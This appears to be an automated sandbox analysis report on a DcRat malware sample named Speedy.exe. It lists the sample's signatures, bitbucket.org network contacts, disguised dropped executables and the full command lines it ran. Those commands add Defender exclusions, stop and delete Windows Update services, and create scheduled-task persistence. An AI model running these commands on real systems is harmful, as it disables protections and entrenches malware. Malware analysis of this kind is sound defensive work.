Analysis Overview
SHA256
1c0757e44587291a3152fe7c3ee1d49c64c5ad9bbfd2123a65a772783f0bc096
Threat Level: Known bad
The file Speedy.exe was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Modifies security service
DcRat
DCRat payload
Drops file in Drivers directory
Blocklisted process makes network request
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Stops running service(s)
Executes dropped EXE
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Power Settings
Drops file in Windows directory
Launches sc.exe
Drops file in Program Files directory
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
Unsigned PE
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-21 19:24
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-21 19:24
Reported
2024-07-21 19:27
Platform
win7-20240705-en
Max time kernel
118s
Max time network
120s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Speedy.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 3032 wrote to memory of 2364 | N/A | C:\Users\Admin\AppData\Local\Temp\Speedy.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3032 wrote to memory of 2364 | N/A | C:\Users\Admin\AppData\Local\Temp\Speedy.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3032 wrote to memory of 2364 | N/A | C:\Users\Admin\AppData\Local\Temp\Speedy.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2364 wrote to memory of 1892 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2364 wrote to memory of 1892 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2364 wrote to memory of 1892 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Speedy.exe
"C:\Users\Admin\AppData\Local\Temp\Speedy.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#quz#>[System.Windows.Forms.MessageBox]::Show('Error 401: No VPS is allowed!','','OK','Error')<#fxy#>;
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | bitbucket.org | udp |
| GB | 185.166.141.9:443 | bitbucket.org | tcp |
| GB | 185.166.141.9:443 | bitbucket.org | tcp |
| GB | 185.166.141.9:443 | bitbucket.org | tcp |
| GB | 185.166.141.9:443 | bitbucket.org | tcp |
Files
memory/3032-0-0x000007FEF5B83000-0x000007FEF5B84000-memory.dmp
memory/3032-1-0x0000000001000000-0x000000000102E000-memory.dmp
memory/2364-6-0x0000000002C20000-0x0000000002CA0000-memory.dmp
memory/2364-7-0x000000001B780000-0x000000001BA62000-memory.dmp
memory/2364-8-0x0000000001D80000-0x0000000001D88000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| Hash | Value |
|---|---|
| MD5 | c3e23a674037974ce33009b2973f2c23 |
| SHA1 | 24c7a1c0d5b2ea895d56b52129ab4ca6f0e5b21e |
| SHA256 | ec3f82cbe08fbafcb66bb15a64c5c270eb097b8d42dbd7b720509451aa556507 |
| SHA512 | ba1782aa7c2ec142000a7675ff4cf92481c9b6cd5e7a79578d987fde0b7febc7ba36b63e8811fe0031d95d9dc5dde9753b347a5b7436192ac1ba3b802039e296 |
memory/2364-14-0x0000000002C20000-0x0000000002CA0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-21 19:24
Reported
2024-07-21 19:27
Platform
win10v2004-20240709-en
Max time kernel
136s
Max time network
130s
Command Line
Signatures
DcRat
Modifies security service
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\system32\reg.exe | N/A |
Process spawned unexpected child process
| Description | Indicator | Process | Target |
|---|---|---|---|
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
DCRat payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\ft.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\DriverHostCrtNet\comSvc.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Speedy.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Tor.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\DriverHostCrtNet\comSvc.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\DriverHostCrtNet\System.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ft.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Tor.exe | N/A |
| N/A | N/A | C:\DriverHostCrtNet\comSvc.exe | N/A |
| N/A | N/A | C:\DriverHostCrtNet\System.exe | N/A |
| N/A | N/A | C:\DriverHostCrtNet\System.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Program Files (x86)\Google\Temp\cc11b995f2a76d | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\lib\images\cursors\RCXE5A1.tmp | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File created | C:\Program Files\ModifiableWindowsApps\conhost.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File created | C:\Program Files\Windows Security\BrowserCore\en-US\e6c9b481da804f | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.371\RCXF4C0.tmp | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.371\RCXF4C1.tmp | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File created | C:\Program Files\Windows Security\BrowserCore\en-US\OfficeClickToRun.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files\Windows Security\BrowserCore\en-US\OfficeClickToRun.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.371\System.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File created | C:\Program Files\Windows Multimedia Platform\lsass.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files\Windows Security\BrowserCore\en-US\RCXEB05.tmp | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Temp\RCXFA73.tmp | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Temp\winlogon.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files\Windows Multimedia Platform\RCX11F.tmp | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files\Windows Multimedia Platform\lsass.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\winlogon.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files\Windows Security\BrowserCore\en-US\RCXEAF4.tmp | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\lib\images\cursors\RCXE600.tmp | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File created | C:\Program Files\Google\Chrome\updaterload.exe | C:\Users\Admin\AppData\Local\Temp\ft.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.371\27d1bcfc3c54e0 | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\lib\images\cursors\conhost.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File created | C:\Program Files\Java\jre-1.8\lib\images\cursors\conhost.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File created | C:\Program Files\Java\jre-1.8\lib\images\cursors\088424020bedd6 | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Temp\RCXFA04.tmp | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Program Files\Windows Multimedia Platform\RCX19D.tmp | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File created | C:\Program Files (x86)\Google\Update\1.3.36.371\System.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File created | C:\Program Files\Windows Multimedia Platform\6203df4a6bafc7 | C:\DriverHostCrtNet\comSvc.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Windows\Web\RuntimeBroker.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File created | C:\Windows\Web\9e8d7a4ca61bd9 | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Windows\Web\RCXF019.tmp | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Windows\Web\RCXF01A.tmp | C:\DriverHostCrtNet\comSvc.exe | N/A |
| File opened for modification | C:\Windows\Web\RuntimeBroker.exe | C:\DriverHostCrtNet\comSvc.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Tor.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\DriverHostCrtNet\comSvc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings | C:\DriverHostCrtNet\System.exe | N/A |
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Speedy.exe
"C:\Users\Admin\AppData\Local\Temp\Speedy.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#quz#>[System.Windows.Forms.MessageBox]::Show('Error 401: No VPS is allowed!','','OK','Error')<#fxy#>;
C:\Users\Admin\AppData\Local\Temp\ft.exe
"C:\Users\Admin\AppData\Local\Temp\ft.exe"
C:\Users\Admin\AppData\Local\Temp\Tor.exe
"C:\Users\Admin\AppData\Local\Temp\Tor.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\DriverHostCrtNet\KNpp6xs8D.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\DriverHostCrtNet\unV39Cxd.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\DriverHostCrtNet\comSvc.exe
"C:\DriverHostCrtNet\comSvc.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\SYSTEM32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#velngcggt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskEditor' /tr '''C:\Program Files\Google\Chrome\updaterload.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaterload.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskEditor' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskEditor" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updaterload.exe' }
C:\Windows\system32\sc.exe
sc stop UsoSvc
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\services.exe'" /f
C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\All Users\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\services.exe'" /rl HIGHEST /f
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\services.exe'" /rl HIGHEST /f
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Java\jre-1.8\lib\images\cursors\conhost.exe'" /f
C:\Windows\system32\sc.exe
sc stop bits
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Java\jre-1.8\lib\images\cursors\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Java\jre-1.8\lib\images\cursors\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\sc.exe
sc stop dosvc
C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\DriverHostCrtNet\StartMenuExperienceHost.exe'" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\DriverHostCrtNet\StartMenuExperienceHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\DriverHostCrtNet\StartMenuExperienceHost.exe'" /rl HIGHEST /f
C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\OfficeClickToRun.exe'" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\OfficeClickToRun.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Admin\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Windows\Web\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Web\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Windows\Web\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\DriverHostCrtNet\System.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\DriverHostCrtNet\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\DriverHostCrtNet\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Google\Update\1.3.36.371\System.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Update\1.3.36.371\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Google\Update\1.3.36.371\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
